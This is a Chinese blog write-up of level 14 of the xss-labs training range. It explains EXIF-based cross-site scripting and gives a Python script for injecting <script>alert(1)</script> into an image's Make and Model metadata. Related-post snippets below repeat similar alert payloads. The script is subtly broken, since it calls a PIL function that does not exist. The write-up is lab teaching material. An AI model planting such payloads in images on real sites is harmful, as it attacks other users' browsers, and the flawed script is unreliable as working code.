[网络安全]xss-labs level-14 解题详析

于 2023-08-04 10:45:33 发布
阅读量2.4k 收藏
点赞数 1
分类专栏: 网络安全 # Xss-Labs靶场攻防实战 文章标签: web安全 xss 安全 xsslabs exif xss
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/132097198
版权

读者可参考、订阅专栏:Xss-Labs靶场攻防实战

姿势

逻辑后端代码:

在这里插入图片描述
该题涉及exif xss漏洞

exif xss漏洞

Exif XSS 漏洞是一种安全漏洞,存在于图片的 Exif(Exchangeable Image File Format)数据中。
Exif 数据是嵌入在数字图像文件中的元数据,包含有关图像的信息,如拍摄日期、相机型号、GPS 坐标等。浏览器和其他应用程序通常会解析和显示这些数据。

在这里插入图片描述

当存在 Exif XSS 漏洞时,攻击者可以在图像的 Exif 数据中插入恶意的 JavaScript 代码。当用户加载带有恶意 Exif 数据的图像时,浏览器或其他应用程序可能会错误地解析恶意代码,并在受害者的浏览器上执行它。

脚本如下:

import PIL.ExifTags as ExifTags
from PIL import Image

# 打开图像文件
image = Image.open('初始.jpg')

# 获取图像的 Exif 数据
exif_data = image._getexif()

# 将 Exif 数据转为可修改的字典格式
exif_dict = dict(exif_data)

# 修改 Exif 数据
exif_dict[ExifTags.TAGS['Make']] = 'xss语句'
exif_dict[ExifTags.TAGS['Model']] = 'xss语句'

# 将修改后的 Exif 数据重新写回图像
exif_bytes = ExifTags.exif_dict_to_bytes(exif_dict)
image.save('改后.jpg', exif=exif_bytes)

先修改iframe标签:

在这里插入图片描述

接着使用脚本修改图像数据,xss语句为:

<script>alert(1)</script>

再上传图片:

在这里插入图片描述

回显如下:

在这里插入图片描述

总结

以上为[网络安全]xss-labs level-14 解题详析,后续将分享[网络安全]xss-labs level-15 解题详析。

我是秋说,我们下次见。

秋说
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试之---xss-labs闯关【1-14关】
qq_43168364的博客
04-18 2921
万能检测语句 <SCRscriptIPT>’”()Oonnjavascript 这条语句将给我们本次的闯关之旅带来极大的帮助 第一关 [Payload:<script>alert(/pig/)</script>] 首先看到了有查询字符串,我们心花怒放了。 先万能检测一下 好家伙啥都没有过滤,那就很easy了 第二关 [payload: ”>&......
XSS lab 1~14
m0_74047291的博客
11-10 238
xss初学者的作业
XSSxss-labs-level14
Hugu
02-24 1252
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码
xss-labs靶场训练(14-20)
ldzhhh的博客
05-25 1778
第十四关 这一关iframe调用的文件地址访问失败,已经无法测试了。 这关主要考察exif xss漏洞,具体可以参考前辈的先知文章:exif xss 第十五关 后台关键代码: <html ng-app> <head> <meta charset="utf-8"> <script src="angular.min.js"></script> <script> window.alert = function
[靶场] XSS-Labs 14-20
3hex的博客
09-22 1346
由于有FlashXSS,需要配置一下环境,下载Flash和JPEXS(Flash反编译工具)。 14. Level14-图片EXIF注入 这关卡的iframe引用的地址打不开,我们自己写一个简单的放在本地服务器上,引用对应的URL就行,同时需要打开php_exif开关。 index.php放在根目录,URL为http://127.0.0.1 <?php echo ' <html> <head> <meta http-equiv=.
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs-master源码
07-06
20关xss靶场练习,帮助了解关于xss
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
安装xss-labs ppt手册
最新发布
10-22
XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取敏感信息或对用户进行欺诈。为了学习和...
XSS-labs靶场实战(五)——第12-14
永远是少年
11-19 796
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第7-8关。 一、第十二关 二、第十三关 三、第十四关
XSS-labs
Mccc_li的博客
04-09 1071
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xss小游戏1-20,详细攻略(level14level19详解)
jhfjdf的博客
07-14 3002
XSS小游戏通关攻略 level1 直接修改name参数的值为: <script>alert(1)</script> 解释:利用<script>标签下的alert()弹窗 level2 尝试使用level1的: <script>alert(1)</script> 查看网页源代码: 很明显,level2关卡的值被传到了value里 尝试使用 " onmouseover='alert(1)' 闭合vlaue的双引号 level3 尝试
sqli labs less 14
Xiaoxiaoqiang_的博客
03-02 201
sql注入
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 2万+
xss靶场一到二十关通关详细教程
XSS labs 闯关大合集
m0_62879498的博客
03-19 4037
XSS labs 闯关大合集 level 1 首先,一进入页面,我们发现图片中说:欢迎用户test ,结合我们看见url栏中 name=test 我们就会怀疑 网页将 name参数的值回显到页面中 我们尝试一下,让 name=hcj 查看回显。 查看页面源代码: <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html
讲讲EXIF Viewer XSS漏洞的来龙去脉
→_→
07-01 812
前言 2016年4月21日@补天漏洞响应平台 爆出 @乌云网 存在存储型XSS漏洞,那些年exif插件做过的事——乌云存储型XSS(已被人批量打COOKIE) 通过长图可以看到该漏洞的最终成因是因为chrome插件Exif Viewer获取图片exif信息时没有进行过滤,导致了XSS代码的执行。 随后,乌云官方也迅速提交了该漏洞到自己平台(不要问我怎么知道是乌云官方自己提交的,你猜~),如图: 并且忽略了该漏洞,并表示会对WooYun图片上传进行处理: 但是截至发稿前,乌云依旧没有对图
Exif xss
weixin_30384031的博客
02-12 203
这种XSS出现的状况会特别少。 Exif是啥???   可交换图像文件格式(英语:Exchangeable image file format,官方简称Exif),是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。 将XSS写到Exif里(PowerExifexif是PHP拓展,如果要用exif_read_data函数要记得开启拓展。 如下DEMO: &...
exif xss 复现
shy的博客
03-12 1962
最近玩xss挑战玩到第14关,玩不下去了,因为第14关中的一个URL失效了。后面百度了一下,发现第14关是玩的是图片exif信息中xss,于是决定自己复现一下。 1,什么是exif 可交换图像文件格式(英语:Exchangeable image file format,官方简称Exif),是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。可使用鼠标右键进...
xss-labs第14
08-18
XSS-labs的第14关中,我没有找到相关的引用内容来提供详细信息或解答您的问题。 但是,XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台,每个关卡都有不同的挑战和漏洞。在第14关中,您可能需要利用某种XSS漏洞来完成任务。您可以尝试查看关卡的源代码、输入不同的payload来测试和找到漏洞,并以创造性的方式绕过安全措施。请记住,在现实世界中,利用XSS漏洞是违法的行为,请确保您只在合法的环境中进行测试和学习。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [XSS-labs通关](https://blog.csdn.net/u010277543/article/details/120937928)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [渗透测试之---xss-labs闯关【1-14关】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值